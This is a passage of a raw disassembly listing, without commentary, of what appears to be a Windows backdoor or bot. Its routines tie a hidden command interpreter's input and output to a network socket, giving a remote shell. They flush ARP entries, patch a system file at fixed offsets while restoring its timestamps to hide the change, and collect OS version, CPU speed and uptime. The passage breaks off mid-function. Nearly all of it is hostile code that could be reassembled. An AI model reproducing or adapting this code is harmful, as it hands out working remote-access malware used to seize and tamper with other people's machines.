call DeleteIpNetEntry ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_40B928
jmp short loc_40B95C
; ---------------------------------------------------------------------------
loc_40B939: ; CODE XREF: sub_40B89A+75�j
push 42F9F0h
loc_40B93E: ; CODE XREF: sub_40B89A+5A�j
; sub_40B89A+D6�j
lea eax, [ebp+var_88]
push eax
call sub_41795B
pop ecx
pop ecx
loc_40B94C: ; CODE XREF: sub_40B89A+53�j
lea eax, [ebp+var_88]
mov [ebp+var_4], edi
push eax
call sub_40CB08
pop ecx
loc_40B95C: ; CODE XREF: sub_40B89A+89�j
; sub_40B89A+9D�j
push esi ; lpMem
call sub_418227
mov eax, [ebp+var_4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40B96B: ; CODE XREF: sub_40B89A+2E�j
push 42F9B0h
jmp short loc_40B93E
sub_40B89A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B972(SOCKET s)
sub_40B972 proc near ; CODE XREF: sub_401444+231�p
; sub_402110+253�p ...
name = sockaddr ptr -14h
namelen = dword ptr -4
s = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
mov [ebp+namelen], eax
push eax
lea eax, [ebp+name]
push 0
push eax
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+namelen]
push eax ; namelen
lea eax, [ebp+name]
push eax ; name
push [ebp+s] ; s
call getsockname ; getsockname
movzx eax, [ebp+name.sa_data+5]
push eax
mov esi, 446150h
movzx eax, [ebp+name.sa_data+4]
push eax
movzx eax, [ebp+name.sa_data+3]
push eax
movzx eax, [ebp+name.sa_data+2]
push eax
push 42BC28h
push esi
call sub_41795B
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_40B972 endp
; =============== S U B R O U T I N E =======================================
sub_40B9CB proc near ; CODE XREF: sub_4010B2+24C�p
; sub_4010B2+292�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
xor edx, edx
cmp ecx, 1
push esi
jle short loc_40B9F6
lea eax, [ecx-2]
push edi
shr eax, 1
inc eax
mov esi, eax
neg esi
lea ecx, [ecx+esi*2]
mov esi, [esp+8+arg_0]
loc_40B9E9: ; CODE XREF: sub_40B9CB+26�j
movzx edi, word ptr [esi]
add edx, edi
inc esi
inc esi
dec eax
jnz short loc_40B9E9
pop edi
jmp short loc_40B9FA
; ---------------------------------------------------------------------------
loc_40B9F6: ; CODE XREF: sub_40B9CB+A�j
mov esi, [esp+4+arg_0]
loc_40B9FA: ; CODE XREF: sub_40B9CB+29�j
test ecx, ecx
jz short loc_40BA03
movzx eax, byte ptr [esi]
add edx, eax
loc_40BA03: ; CODE XREF: sub_40B9CB+31�j
mov ecx, edx
and edx, 0FFFFh
shr ecx, 10h
add ecx, edx
pop esi
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
retn
sub_40B9CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BA1B proc near ; CODE XREF: sub_40F8D6+10D�p
VersionInformation= _OSVERSIONINFOA ptr -94h
push ebp
mov ebp, esp
sub esp, 94h
lea eax, [ebp+VersionInformation]
mov [ebp+VersionInformation.dwOSVersionInfoSize], 94h
push eax ; lpVersionInformation
call GetVersionExA ; GetVersionExA
cmp [ebp+VersionInformation.dwMajorVersion], 5
jnz short loc_40BA66
cmp [ebp+VersionInformation.dwMinorVersion], 1
jnz short loc_40BA66
lea eax, [ebp+VersionInformation.szCSDVersion]
push 42FAA4h
push eax
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_40BA66
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_40BA66: ; CODE XREF: sub_40BA1B+27�j
; sub_40BA1B+30�j ...
xor eax, eax
leave
retn
sub_40BA1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40BA6A(LPCSTR lpMultiByteStr)
sub_40BA6A proc near ; CODE XREF: sub_40BAB1+A1�p
WideCharStr = word ptr -200h
lpMultiByteStr = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+WideCharStr]
push 100h ; cchWideChar
push eax ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
push 42FAA8h
call dword ptr byte_4240D4+4
push 5
push eax
call dword ptr byte_4240D4
lea ecx, [ebp+WideCharStr]
push 0FFFFFFFFh
push ecx
push 0
call eax
leave
retn
sub_40BA6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_40BAB1(LPVOID)
sub_40BAB1 proc near ; DATA XREF: sub_40F8D6+1A9�o
var_3B0 = dword ptr -3B0h
var_3A0 = dword ptr -3A0h
s = dword ptr -1A0h
var_19C = dword ptr -19Ch
MultiByteStr = byte ptr -198h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
CreationTime = _FILETIME ptr -88h
LastWriteTime = _FILETIME ptr -80h
LastAccessTime = _FILETIME ptr -78h
lpBuffer = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3A0h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 46h
mov esi, eax
pop ecx
lea edi, [ebp+s]
rep movsd
xor esi, esi
mov edx, 42FB18h
inc esi
mov ecx, 42FB14h
mov [eax+114h], esi
mov eax, 440FACh
xor ebx, ebx
push esi ; dwMilliseconds
mov [ebp+var_50], 42FB10h
mov [ebp+var_4C], 42FB0Ch
mov [ebp+var_48], 42FB08h
mov [ebp+var_44], eax
mov [ebp+var_40], edx
mov [ebp+var_3C], ecx
mov [ebp+var_38], eax
mov [ebp+var_34], eax
mov [ebp+lpBuffer], 42FB04h
mov [ebp+var_6C], 42FB00h
mov [ebp+var_68], 42FAFCh
mov [ebp+var_64], eax
mov [ebp+var_60], edx
mov [ebp+var_5C], ecx
mov [ebp+var_58], eax
mov [ebp+var_54], eax
mov [ebp+var_8], ebx
call sub_418175
mov [ebp+var_C], eax
mov [ebp+var_10], ebx
mov [esp+3B0h+var_3B0], 7530h
call Sleep ; Sleep
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
call sub_40BA6A
pop ecx
mov edi, 80h
lea eax, [ebp+MultiByteStr]
push edi ; dwFileAttributes
push eax ; lpFileName
call SetFileAttributesA ; SetFileAttributesA
push ebx
push edi
push 3
push ebx
push esi
lea eax, [ebp+MultiByteStr]
push 80000000h
push eax
call dword ptr byte_424084
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_40BBAA
lea ecx, [ebp+LastWriteTime]
push ecx ; lpLastWriteTime
lea ecx, [ebp+LastAccessTime]
push ecx ; lpLastAccessTime
lea ecx, [ebp+CreationTime]
push ecx ; lpCreationTime
push eax ; hFile
call GetFileTime ; GetFileTime
push [ebp+arg_0]
call dword ptr byte_424074+4
loc_40BBAA: ; CODE XREF: sub_40BAB1+D8�j
lea eax, [ebp+MultiByteStr]
push 42FAF8h
push eax
call sub_41924D
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_0], eax
jnz short loc_40BC01
push [ebp+var_94]
lea eax, [ebp+var_3A0]
push 42FAD4h
push 200h
push eax
call sub_417EDA
lea eax, [ebp+var_3A0]
push eax
call sub_40CB08
push [ebp+var_19C]
call sub_417735
add esp, 18h
push ebx ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_40BC01: ; CODE XREF: sub_40BAB1+111�j
mov eax, [ebp+var_94]
dec eax
jz loc_40BCCA
dec eax
jnz loc_40BD78
mov [ebp+var_30], 130h
mov [ebp+var_2C], 131h
mov [ebp+var_28], 132h
mov [ebp+var_24], 133h
mov [ebp+var_20], 4F5A2h
mov [ebp+var_1C], 4F5A3h
mov [ebp+var_18], 4F5A4h
mov [ebp+var_14], 4F5A5h
mov [ebp+var_4], ebx
loc_40BC50: ; CODE XREF: sub_40BAB1+1DE�j
mov eax, [ebp+var_4]
push ebx
push [ebp+eax+var_30]
push [ebp+arg_0]
call sub_4191A1
push [ebp+arg_0]
push esi
push esi
push [ebp+var_C]
call sub_418F61
mov eax, [ebp+var_4]
push esi
push [ebp+eax+lpBuffer]
push [ebp+var_C]
call sub_419400
add esp, 28h
test eax, eax
jnz short loc_40BC87
inc [ebp+var_8]
loc_40BC87: ; CODE XREF: sub_40BAB1+1D1�j
add [ebp+var_4], 4
cmp [ebp+var_4], 20h
jl short loc_40BC50
cmp [ebp+var_8], 8
jge loc_40BD78
mov [ebp+var_10], esi
loc_40BC9E: ; CODE XREF: sub_40BAB1+212�j
push 0
push [ebp+ebx+var_30]
push [ebp+arg_0]
call sub_4191A1
push [ebp+arg_0] ; int
push esi ; int
push esi ; int
push [ebp+ebx+lpBuffer] ; lpBuffer
call sub_41990C
add ebx, 4
add esp, 1Ch
cmp ebx, 20h
jl short loc_40BC9E
jmp loc_40BD76
; ---------------------------------------------------------------------------
loc_40BCCA: ; CODE XREF: sub_40BAB1+157�j
mov [ebp+var_30], 130h
mov [ebp+var_2C], 131h
mov [ebp+var_28], 132h
mov [ebp+var_24], 133h
mov [ebp+var_20], 4F322h
mov [ebp+var_1C], 4F323h
mov [ebp+var_18], 4F324h
mov [ebp+var_14], 4F325h
mov [ebp+var_4], ebx
loc_40BD05: ; CODE XREF: sub_40BAB1+293�j
mov eax, [ebp+var_4]
push ebx
push [ebp+eax+var_30]
push [ebp+arg_0]
call sub_4191A1
push [ebp+arg_0]
push esi
push esi
push [ebp+var_C]
call sub_418F61
mov eax, [ebp+var_4]
push esi
push [ebp+eax+var_50]
push [ebp+var_C]
call sub_419400
add esp, 28h
test eax, eax
jnz short loc_40BD3C
inc [ebp+var_8]
loc_40BD3C: ; CODE XREF: sub_40BAB1+286�j
add [ebp+var_4], 4
cmp [ebp+var_4], 20h
jl short loc_40BD05
cmp [ebp+var_8], 8
jge short loc_40BD78
mov [ebp+var_10], esi
loc_40BD4F: ; CODE XREF: sub_40BAB1+2C3�j
push 0
push [ebp+ebx+var_30]
push [ebp+arg_0]
call sub_4191A1
push [ebp+arg_0] ; int
push esi ; int
push esi ; int
push [ebp+ebx+var_50] ; lpBuffer
call sub_41990C
add ebx, 4
add esp, 1Ch
cmp ebx, 20h
jl short loc_40BD4F
loc_40BD76: ; CODE XREF: sub_40BAB1+214�j
xor ebx, ebx
loc_40BD78: ; CODE XREF: sub_40BAB1+15E�j
; sub_40BAB1+1E4�j ...
push [ebp+arg_0]
call sub_418F0B
pop ecx
lea eax, [ebp+MultiByteStr]
push ebx
push edi
push 3
push ebx
push 2
push 40000000h
push eax
call dword ptr byte_424084
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40BDBE
lea eax, [ebp+LastWriteTime]
push eax ; lpLastWriteTime
lea eax, [ebp+LastAccessTime]
push eax ; lpLastAccessTime
lea eax, [ebp+CreationTime]
push eax ; lpCreationTime
push esi ; hFile
call SetFileTime ; SetFileTime
push esi
call dword ptr byte_424074+4
loc_40BDBE: ; CODE XREF: sub_40BAB1+2EE�j
cmp [ebp+var_10], ebx
jz short loc_40BE0C
push [ebp+var_94]
lea eax, [ebp+var_3A0]
push 42FAB4h
push 200h
push eax
call sub_417EDA
push ebx ; int
lea eax, [ebp+var_3A0]
push [ebp+var_90] ; int
push eax ; int
push 4316BCh ; int
push [ebp+s] ; s
call sub_40E1D6
lea eax, [ebp+var_3A0]
push eax
call sub_40CB08
add esp, 28h
loc_40BE0C: ; CODE XREF: sub_40BAB1+310�j
push [ebp+var_19C]
mov dword ptr unk_4315CC, ebx
call sub_417735
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
sub_40BAB1 endp
; =============== S U B R O U T I N E =======================================
sub_40BE25 proc near ; CODE XREF: sub_40BE55+2A�p
; sub_40BE8D+7E�p ...
mov eax, dword ptr byte_445EDC+288h
push esi
mov esi, dword ptr byte_424074+4
cmp eax, 0FFFFFFFFh
jz short loc_40BE39
push eax
call esi
loc_40BE39: ; CODE XREF: sub_40BE25+F�j
mov eax, dword ptr byte_445EDC+290h
cmp eax, 0FFFFFFFFh
jz short loc_40BE46
push eax
call esi
loc_40BE46: ; CODE XREF: sub_40BE25+1C�j
mov eax, dword ptr byte_445EDC+284h
cmp eax, 0FFFFFFFFh
jz short loc_40BE53
push eax
call esi
loc_40BE53: ; CODE XREF: sub_40BE25+29�j
pop esi
retn
sub_40BE25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40BE55(LPCVOID lpBuffer)
sub_40BE55 proc near ; CODE XREF: sub_40CECF+14A�p
; sub_40FCA3+4AFB�p
NumberOfBytesWritten= dword ptr -4
lpBuffer = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+lpBuffer]
call sub_4180D0
pop ecx
mov [ebp+NumberOfBytesWritten], eax
lea ecx, [ebp+NumberOfBytesWritten]
push 0 ; lpOverlapped
push ecx ; lpNumberOfBytesWritten
push eax ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push dword ptr byte_445EDC+28Ch ; hFile
call WriteFile ; WriteFile
test eax, eax
jnz short loc_40BE88
call sub_40BE25
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40BE88: ; CODE XREF: sub_40BE55+28�j
xor eax, eax
inc eax
leave
retn
sub_40BE55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40BE8D(SOCKET s, int, int)
sub_40BE8D proc near ; CODE XREF: sub_40BF14+D3�p
; sub_40BF14+F2�p ...
buf = byte ptr -200h
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push 440F9Ch
push [ebp+arg_4]
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_40BED0
push 7D0h ; dwMilliseconds
call Sleep ; Sleep
push [ebp+arg_8]
lea eax, [ebp+buf]
push [ebp+arg_4]
push 42FB1Ch
push eax
call sub_41795B
add esp, 10h
jmp short loc_40BEE7
; ---------------------------------------------------------------------------
loc_40BED0: ; CODE XREF: sub_40BE8D+1A�j
push [ebp+arg_8]
lea eax, [ebp+buf]
push 42744Ch
push eax
call sub_41795B
add esp, 0Ch
loc_40BEE7: ; CODE XREF: sub_40BE8D+41�j
lea eax, [ebp+buf]
push 0 ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call send_0
test eax, eax
jg short loc_40BF10
call sub_40BE25
loc_40BF10: ; CODE XREF: sub_40BE8D+7C�j
xor eax, eax
leave
retn
sub_40BE8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_40BF14(LPVOID)
sub_40BF14 proc near ; DATA XREF: sub_40C069+170�o
Buffer = byte ptr -20Ch
var_C = byte ptr -0Ch
ExitCode = dword ptr -8
BytesRead = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
mov esi, 200h
xor edi, edi
mov ebx, 446170h
loc_40BF2C: ; CODE XREF: sub_40BF14+79�j
; sub_40BF14+DB�j
push esi
lea eax, [ebp+Buffer]
push edi
push eax
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+BytesRead]
push edi ; lpBytesLeftThisMessage
push edi ; lpTotalBytesAvail
push eax ; lpBytesRead
lea eax, [ebp+Buffer]
push esi ; nBufferSize
push eax ; lpBuffer
push dword ptr byte_445EDC+288h ; hNamedPipe
call PeekNamedPipe ; PeekNamedPipe
test eax, eax
jz loc_40BFFA
cmp [ebp+BytesRead], edi
jnz short loc_40BF8F
lea eax, [ebp+ExitCode]
push eax ; lpExitCode
push dword ptr byte_445EDC+284h ; hProcess
call GetExitCodeProcess ; GetExitCodeProcess
test eax, eax
jz short loc_40BF85
cmp [ebp+ExitCode], 103h
jnz loc_40C01E
loc_40BF85: ; CODE XREF: sub_40BF14+62�j
push 0Ah ; dwMilliseconds
call Sleep ; Sleep
jmp short loc_40BF2C
; ---------------------------------------------------------------------------
loc_40BF8F: ; CODE XREF: sub_40BF14+4E�j
xor eax, eax
cmp [ebp+BytesRead], edi
jbe short loc_40BFA6
loc_40BF96: ; CODE XREF: sub_40BF14+90�j
cmp [ebp+eax+Buffer], 0Ah
jz short loc_40BFF4
inc eax
cmp eax, [ebp+BytesRead]
jb short loc_40BF96
loc_40BFA6: ; CODE XREF: sub_40BF14+80�j
mov [ebp+BytesRead], esi
loc_40BFA9: ; CODE XREF: sub_40BF14+E4�j
push esi
lea eax, [ebp+Buffer]
push edi
push eax
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+var_C]
push edi
push eax
push [ebp+BytesRead]
lea eax, [ebp+Buffer]
push eax
push dword ptr byte_445EDC+288h
call dword ptr byte_424074
test eax, eax
jz short loc_40C046
lea eax, [ebp+Buffer]
push eax ; int
push ebx ; int
push dword ptr byte_445EDC+2C8h ; s
call sub_40BE8D
add esp, 0Ch
jmp loc_40BF2C
; ---------------------------------------------------------------------------
loc_40BFF4: ; CODE XREF: sub_40BF14+8A�j
inc eax
mov [ebp+BytesRead], eax
jmp short loc_40BFA9
; ---------------------------------------------------------------------------
loc_40BFFA: ; CODE XREF: sub_40BF14+45�j
push 42FBA4h ; int
push ebx ; int
push dword ptr byte_445EDC+2C8h ; s
call sub_40BE8D
push [ebp+arg_0]
call sub_417735
add esp, 10h
push 1 ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_40C01E: ; CODE XREF: sub_40BF14+6B�j
call sub_40BE25
push 42FB6Ch ; int
push ebx ; int
push dword ptr byte_445EDC+2C8h ; s
call sub_40BE8D
push [ebp+arg_0]
call sub_417735
add esp, 10h
push edi ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_40C046: ; CODE XREF: sub_40BF14+C3�j
push 42FB2Ch ; int
push ebx ; int
push dword ptr byte_445EDC+2C8h ; s
call sub_40BE8D
push [ebp+arg_0]
call sub_417735
add esp, 10h
push edi ; dwExitCode
call ExitThread ; ExitThread
sub_40BF14 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C069 proc near ; CODE XREF: sub_40CECF+99�p
; sub_40FCA3+58CA�p
var_378 = byte ptr -378h
ApplicationName = byte ptr -178h
StartupInfo = _STARTUPINFOA ptr -74h
ThreadId = dword ptr -30h
ProcessInformation= _PROCESS_INFORMATION ptr -2Ch
PipeAttributes = _SECURITY_ATTRIBUTES ptr -1Ch
hReadPipe = dword ptr -10h
hWritePipe = dword ptr -0Ch
hSourceHandle = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push ebx
push esi
push edi
call sub_40BE25
xor esi, esi
lea eax, [ebp+ApplicationName]
push esi
push eax
push 104h
push esi
push 42FC5Ch
push esi
call dword ptr byte_445EDC
test eax, eax
jz loc_40C163
lea eax, [ebp+PipeAttributes]
mov edi, CreatePipe
push esi ; nSize
push eax ; lpPipeAttributes
lea eax, [ebp+hWritePipe]
xor ebx, ebx
push eax ; hWritePipe
lea eax, [ebp+hReadPipe]
inc ebx
push eax ; hReadPipe
mov [ebp+PipeAttributes.nLength], 0Ch
mov [ebp+PipeAttributes.bInheritHandle], ebx
mov [ebp+PipeAttributes.lpSecurityDescriptor], esi
call edi ; CreatePipe
test eax, eax
jz loc_40C163
lea eax, [ebp+PipeAttributes]
push esi ; nSize
push eax ; lpPipeAttributes
lea eax, [ebp+hSourceHandle]
push eax ; hWritePipe
lea eax, [ebp+var_4]
push eax ; hReadPipe
call edi ; CreatePipe
test eax, eax
jz loc_40C163
mov edi, GetCurrentProcess
push 3 ; dwOptions
push esi ; bInheritHandle
push esi ; dwDesiredAccess
push (offset byte_445EDC+28Ch) ; lpTargetHandle
call edi ; GetCurrentProcess
push eax ; hTargetProcessHandle
push [ebp+hSourceHandle] ; hSourceHandle
call edi ; GetCurrentProcess
push eax ; hSourceProcessHandle
call DuplicateHandle ; DuplicateHandle
test eax, eax
jz short loc_40C163
push 10h
lea eax, [ebp+ProcessInformation]
push esi
push eax
call sub_4179E0
push 44h
lea eax, [ebp+StartupInfo]
pop edi
push edi
push esi
push eax
call sub_4179E0
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+StartupInfo.hStdInput], eax
mov eax, [ebp+hWritePipe]
mov [ebp+StartupInfo.hStdOutput], eax
mov [ebp+StartupInfo.hStdError], eax
lea eax, [ebp+ProcessInformation]
mov [ebp+StartupInfo.cb], edi
push eax ; lpProcessInformation
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
push esi ; lpCurrentDirectory
push esi ; lpEnvironment
push esi ; dwCreationFlags
push ebx ; bInheritHandles
push esi ; lpThreadAttributes
mov ebx, offset CommandLine
push esi ; lpProcessAttributes
lea eax, [ebp+ApplicationName]
push ebx ; lpCommandLine
push eax ; lpApplicationName
mov [ebp+StartupInfo.dwFlags], 101h
mov [ebp+StartupInfo.wShowWindow], si
call CreateProcessA ; CreateProcessA
test eax, eax
jnz short loc_40C16B
loc_40C163: ; CODE XREF: sub_40C069+2F�j
; sub_40C069+5C�j ...
or eax, 0FFFFFFFFh
jmp loc_40C219
; ---------------------------------------------------------------------------
loc_40C16B: ; CODE XREF: sub_40C069+F8�j
push [ebp+var_4]
mov edi, dword ptr byte_424074+4
call edi
mov eax, [ebp+hReadPipe]
push [ebp+ProcessInformation.hThread]
mov dword ptr byte_445EDC+288h, eax
mov eax, [ebp+hSourceHandle]
mov dword ptr byte_445EDC+290h, eax
mov eax, [ebp+ProcessInformation.hProcess]
mov dword ptr byte_445EDC+284h, eax
call edi
mov eax, [ebp+arg_0]
cmp [ebp+arg_4], esi
mov dword ptr byte_445EDC+2C8h, eax
jz short loc_40C1A5
push [ebp+arg_4]
jmp short loc_40C1A6
; ---------------------------------------------------------------------------
loc_40C1A5: ; CODE XREF: sub_40C069+135�j
push ebx
loc_40C1A6: ; CODE XREF: sub_40C069+13A�j
push 446170h
call sub_41795B
pop ecx
pop ecx
push esi
push 7
push 42FC2Ch
call sub_41741F
mov edi, eax
mov ecx, [ebp+ProcessInformation.dwProcessId]
imul edi, 234h
add esp, 0Ch
mov [edi+44B870h], ecx
lea ecx, [ebp+ThreadId]
push ecx ; lpThreadId
push esi ; dwCreationFlags
push eax ; lpParameter
push offset sub_40BF14 ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
call CreateThread ; CreateThread
cmp eax, esi
mov [edi+44B87Ch], eax
jnz short loc_40C217
call GetLastError
push eax
lea eax, [ebp+var_378]
push 42FBE8h
push eax
call sub_41795B
lea eax, [ebp+var_378]
push eax
call sub_40CB08
add esp, 10h
loc_40C217: ; CODE XREF: sub_40C069+185�j
xor eax, eax
loc_40C219: ; CODE XREF: sub_40C069+FD�j
pop edi
pop esi
pop ebx
leave
retn
sub_40C069 endp
; =============== S U B R O U T I N E =======================================
sub_40C21E proc near ; CODE XREF: sub_407A07+74�p
; sub_40C3BE+217�p ...
arg_0 = dword ptr 4
push esi
push edi
call GetTickCount ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
mov ecx, 15180h
mov esi, 0E10h
push 3Ch
pop edi
sub eax, [esp+8+arg_0]
div ecx
mov ecx, eax
mov eax, edx
xor edx, edx
div esi
mov esi, eax
mov eax, edx
xor edx, edx
div edi
push eax
push esi
push ecx
push 42FC64h
mov esi, 4461A8h
push 32h
push esi
call sub_417EDA
add esp, 18h
mov eax, esi
pop edi
pop esi
retn
sub_40C21E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C271 proc near ; CODE XREF: sub_409990+24�p
VersionInformation= _OSVERSIONINFOA ptr -94h
push ebp
mov ebp, esp
sub esp, 94h
lea eax, [ebp+VersionInformation]
push esi
push eax ; lpVersionInformation
xor esi, esi
mov [ebp+VersionInformation.dwOSVersionInfoSize], 94h
call GetVersionExA ; GetVersionExA
test eax, eax
jz short loc_40C303
cmp [ebp+VersionInformation.dwMajorVersion], 4
jnz short loc_40C2D9
cmp [ebp+VersionInformation.dwMinorVersion], esi
jnz short loc_40C2C1
cmp [ebp+VersionInformation.dwPlatformId], 1
jnz short loc_40C2B3
inc esi
loc_40C2B3: ; CODE XREF: sub_40C271+3F�j
cmp [ebp+VersionInformation.dwPlatformId], 2
jnz short loc_40C303
xor esi, esi
inc esi
jmp short loc_40C303
; ---------------------------------------------------------------------------
loc_40C2C1: ; CODE XREF: sub_40C271+36�j
cmp [ebp+VersionInformation.dwMinorVersion], 0Ah
jnz short loc_40C2CE
loc_40C2CA: ; CODE XREF: sub_40C271+77�j
push 2
jmp short loc_40C302
; ---------------------------------------------------------------------------
loc_40C2CE: ; CODE XREF: sub_40C271+57�j
cmp [ebp+VersionInformation.dwMinorVersion], 5Ah
jnz short loc_40C303
jmp short loc_40C2F3
; ---------------------------------------------------------------------------
loc_40C2D9: ; CODE XREF: sub_40C271+2E�j
cmp [ebp+VersionInformation.dwMajorVersion], 5
jnz short loc_40C303
cmp [ebp+VersionInformation.dwMinorVersion], esi
jz short loc_40C2CA
cmp [ebp+VersionInformation.dwMinorVersion], 1
jnz short loc_40C2F7
loc_40C2F3: ; CODE XREF: sub_40C271+66�j
push 3
jmp short loc_40C302
; ---------------------------------------------------------------------------
loc_40C2F7: ; CODE XREF: sub_40C271+80�j
cmp [ebp+VersionInformation.dwMinorVersion], 2
jnz short loc_40C303
push 7
loc_40C302: ; CODE XREF: sub_40C271+5B�j
; sub_40C271+84�j
pop esi
loc_40C303: ; CODE XREF: sub_40C271+25�j
; sub_40C271+49�j ...
mov eax, esi
pop esi
leave
retn
sub_40C271 endp
; =============== S U B R O U T I N E =======================================
sub_40C308 proc near ; CODE XREF: sub_40C3BE+290�p
push ebx
push esi
push edi
mov edi, 0F4240h
loc_40C310: ; CODE XREF: sub_40C308+2F�j
; sub_40C308+35�j
rdtsc
push 3E8h ; dwMilliseconds
mov ebx, edx
mov esi, eax
call Sleep ; Sleep
rdtsc
sub eax, esi
push 0
sbb edx, ebx
push edi
push edx
push eax
call sub_419AA0
mov esi, edx
mov ebx, eax
test esi, esi
ja short loc_40C310
jb short loc_40C33F
cmp ebx, edi
ja short loc_40C310
loc_40C33F: ; CODE XREF: sub_40C308+31�j
push 0
push 64h
push esi
push ebx
call sub_419A20
mov ecx, edx
push 64h
xor edx, edx
mov edi, eax
test ecx, ecx
pop eax
ja short loc_40C3B2
jb short loc_40C35E
cmp edi, 50h
jnb short loc_40C363
loc_40C35E: ; CODE XREF: sub_40C308+4F�j
push 4Bh
xor edx, edx
pop eax
loc_40C363: ; CODE XREF: sub_40C308+54�j
test ecx, ecx
ja short loc_40C3B2
jb short loc_40C36E
cmp edi, 47h
jnb short loc_40C373
loc_40C36E: ; CODE XREF: sub_40C308+5F�j
push 42h
xor edx, edx
pop eax
loc_40C373: ; CODE XREF: sub_40C308+64�j
test ecx, ecx
ja short loc_40C3B2
jb short loc_40C37E
cmp edi, 37h
jnb short loc_40C383
loc_40C37E: ; CODE XREF: sub_40C308+6F�j
push 32h
xor edx, edx
pop eax
loc_40C383: ; CODE XREF: sub_40C308+74�j
test ecx, ecx
ja short loc_40C3B2
jb short loc_40C38E
cmp edi, 26h
jnb short loc_40C393
loc_40C38E: ; CODE XREF: sub_40C308+7F�j
push 21h
xor edx, edx
pop eax
loc_40C393: ; CODE XREF: sub_40C308+84�j
test ecx, ecx
ja short loc_40C3B2
jb short loc_40C39E
cmp edi, 1Eh
jnb short loc_40C3A3
loc_40C39E: ; CODE XREF: sub_40C308+8F�j
push 19h
xor edx, edx
pop eax
loc_40C3A3: ; CODE XREF: sub_40C308+94�j
test ecx, ecx
ja short loc_40C3B2
jb short loc_40C3AE
cmp edi, 0Ah
jnb short loc_40C3B2
loc_40C3AE: ; CODE XREF: sub_40C308+9F�j
xor eax, eax
xor edx, edx
loc_40C3B2: ; CODE XREF: sub_40C308+4D�j
; sub_40C308+5D�j ...
sub eax, edi
pop edi
sbb edx, ecx
add eax, ebx
adc edx, esi
pop esi
pop ebx
retn
sub_40C308 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40C3BE(int, SOCKET s)
sub_40C3BE proc near ; CODE XREF: sub_40FCA3+5B4F�p
var_968 = dword ptr -968h
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_4E8 = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
var_2E8 = byte ptr -2E8h
Buffer = byte ptr -25Ch
